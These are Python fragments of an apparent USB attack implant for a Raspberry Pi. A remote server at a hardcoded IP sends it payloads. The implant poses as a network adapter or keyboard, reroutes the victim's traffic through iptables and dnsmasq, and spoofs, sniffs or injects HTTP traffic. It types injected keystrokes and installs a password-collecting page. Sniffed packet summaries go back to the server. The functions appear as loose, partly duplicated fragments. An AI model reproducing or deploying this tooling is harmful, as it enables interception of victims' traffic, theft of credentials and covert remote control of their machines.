def on_message(thing, userdata, message):
message = str(message.payload.decode("utf-8"))
data = ast.literal_eval(message)
with open(os.path.join(MainApp.APP_DIR, MainApp.PAYLOADS_FILE),
'wb') as f:
utils.log("Writing payload to file", module="ON MESSAGE")
pickle.dump(data, f)
def executePayload(self, **payload):
super().executePayload(**payload)
scenario = payload.pop("scenario", "").upper()
if scenario == "SPOOFING":
params = payload.pop("params", "")
for param in params:
if "ipAddress" in param and "hostname" in param:
self._spoof(**param)
else:
utils.log(
"At least 1 of required params not specified",
flag="DEBUG",
module=self.__class__.__name__
)
elif scenario == "SNIFF":
self._sniff(**payload)
elif scenario == "INJECT":
self._inject(**payload)
else:
utils.log(
f"Scenario: {scenario} is not implemented. Check spelling",
flag="DEBUG",
module=self.__class__.__name__
)
def _callback(pkt):
utils.log(
output=pkt.summary(),
flag="SNIFF",
module=self.__class__.__name__
)
self._thing.Send(pkt.summary())
def __init__(self,
appDir="/etc/BSc",
configName="config",
payloadsFile="payloads"):
utils.log("START", module=self.__class__.__name__)
self._device = None
self._thing = None
MainApp.APP_DIR = appDir
MainApp.CONFIG_NAME = configName
MainApp.PAYLOADS_FILE = payloadsFile
def on_message(thing, userdata, message):
log("on message")
msg = str(message.payload.decode("utf-8"))
log("message acquired: " + msg)
if msg == 'communication':
thing.Send(thing.externalId)
else:
log("no-communication")
data = ast.literal_eval(msg)
# log('dict: ' + data['muffin'])
log(data)
log(data['deviceType'])
thing.app.launch(data)
def __init__(self, name, idVendor, idProduct,
serial, manufacturer, product, bckPath, thing, nfqueue=None):
self._thing = thing
os.makedirs(bckPath, exist_ok=True)
self._bckPath = bckPath
self.files = {
"dnsmasq": {
"original": "/etc/dnsmasq.conf",
"bck": os.path.join(bckPath, "dnsmasq.conf")
},
"sysctl": {
"original": "/etc/sysctl.conf",
"bck": os.path.join(bckPath, "sysctl.conf")
}
}
for _, item in self.files.items():
shutil.copy(item["original"], item["bck"])
utils.activateModules("dwc2", "g_ether")
os.system("sudo ifconfig usb0 192.168.100.1 netmask 255.255.255.0 up")
with open(self.files["dnsmasq"]["original"], 'w') as file:
file.write("interface=usb0 \nlisten-address=192.168.100.1 \nbind-interfaces \nserver=8.8.8.8 \ndomain-needed \nbogus-priv \ndhcp-range=192.168.100.50,192.168.100.150,12h ")
with open(self.files["sysctl"]["original"], 'a') as file:
file.write("net.ipv4.ip_forward=1")
with open("/proc/sys/net/ipv4/ip_forward", 'w') as file:
file.write('1')
os.system("sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE")
if nfqueue is not None:
os.system(
"sudo iptables -t mangle -A FORWARD -p tcp --dport 80 -j NFQUEUE")
os.system(
"sudo iptables -t mangle -A FORWARD -p tcp --sport 80 -j NFQUEUE")
os.system(
"sudo iptables -A FORWARD -i wlan0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT")
os.system("sudo iptables -A FORWARD -i usb0 -o wlan0 -j ACCEPT")
os.system("sudo ip r a 192.168.100.0/24 via 192.168.100.1 dev usb0")
output, error = Popen(
['service', 'dnsmasq', 'start'],
stdout=PIPE,
stderr=PIPE
).communicate()
if error:
utils.log(error, flag="DEBUG", module=self.__class__.__name__)
if output:
utils.log(output, module=self.__class__.__name__)
def _connect(self):
utils.log("CONNECT", module=self.__class__.__name__)
with open(os.path.join(MainApp.APP_DIR, MainApp.CONFIG_NAME),
'r') as f:
externalID = f.read()
self._thing = Thing(
f'"{externalID}"', f'"{externalID}"',
"http://165.22.121.233:8888/api/authorization/",
"165.22.121.233")
self._thing.on_message = MainApp.on_message
self._thing.Start()
self._thr = threading.Thread(target=self._thing.OnConnected)
self._thr.start()
ni.ifaddresses('wlan0')
ip = ni.ifaddresses('wlan0')[ni.AF_INET][0]['addr']
self._thing.Send(f"External ID: {externalID} IP: {ip}")
utils.log(f"connected with external ID: {externalID}",
module=self.__class__.__name__)
def setup(self, apt=True):
utils.getRootPrivileges()
os.makedirs(MainApp.APP_DIR, exist_ok=True)
with open(os.path.join(MainApp.APP_DIR, MainApp.CONFIG_NAME),
'w') as f:
utils.log("Writing intial data", module=self.__class__.__name__)
f.write(str(random.randint(1000, 9999)))
with open("/boot/config.txt", 'r') as f:
bootOk = "dtparam=spi=on\ndtoverlay=dwc2" in f.read()
if not bootOk:
with open("/boot/config.txt", 'a') as f:
utils.log("Modyfing /boot/config.txt",
module=self.__class__.__name__)
f.write("dtparam=spi=on\ndtoverlay=dwc2\n")
if apt:
utils.aptInstall("dnsmasq", "tcpdump", "apache2", "php")
path = Path(__file__).parent.absolute()
path = str(path) + "/rpiWebsites"
os.system("rm /var/www/html/*")
os.system(f"sudo cp -r {path}/sendpass.php /var/www/html")
os.system(f"sudo cp -r {path}/index.html /var/www/html")
utils.log("SETUP END", module=self.__class__.__name__)
def launch(self):
utils.log("LAUNCH", module=self.__class__.__name__)
utils.getRootPrivileges()
self._connect()
try:
with open(os.path.join(MainApp.APP_DIR, MainApp.PAYLOADS_FILE),
"rb+") as f:
data = pickle.load(f)
os.remove(os.path.join(MainApp.APP_DIR, MainApp.PAYLOADS_FILE))
payloads = data.pop("payloads")
deviceType = data.pop("deviceType").upper()
if deviceType == "KEYBOARD":
self._device = Keyboard(thing=self._thing, **data)
elif deviceType == "ETHER":
self._device = Ether(bckPath=os.path.join(
MainApp.APP_DIR, "bck"),
thing=self._thing,
**data)
else:
raise RuntimeError(f"Unkonwn deviceType: {deviceType}")
for payload in payloads:
self._device.executePayload(**payload)
except Exception as e: # any exception during runtime
utils.log(e, flag="DEBUG", module=self.__class__.__name__)
self._thing.Send(f"ERROR:{e}")
data = None
finally:
if self._device is not None:
self._device.tearDown()
utils.log("waiting for payloads", module=self.__class__.__name__)
while not os.path.exists(
os.path.join(MainApp.APP_DIR, MainApp.PAYLOADS_FILE)):
time.sleep(5)
utils.log("REBOOT", module=self.__class__.__name__)
os.system("sudo reboot")
def tearDown(self, *args, **kwargs):
utils.log("TEARDOWN", module=self.__class__.__name__)
def executePayload(self, **payload):
utils.log(f"Execute payload: {payload}",
module=self.__class__.__name__)
def _out(self, report):
utils.log(report, "DEBUG", module=self.__class__.__name__)
with open("/dev/hidg0", 'rb+') as file:
file.write(report)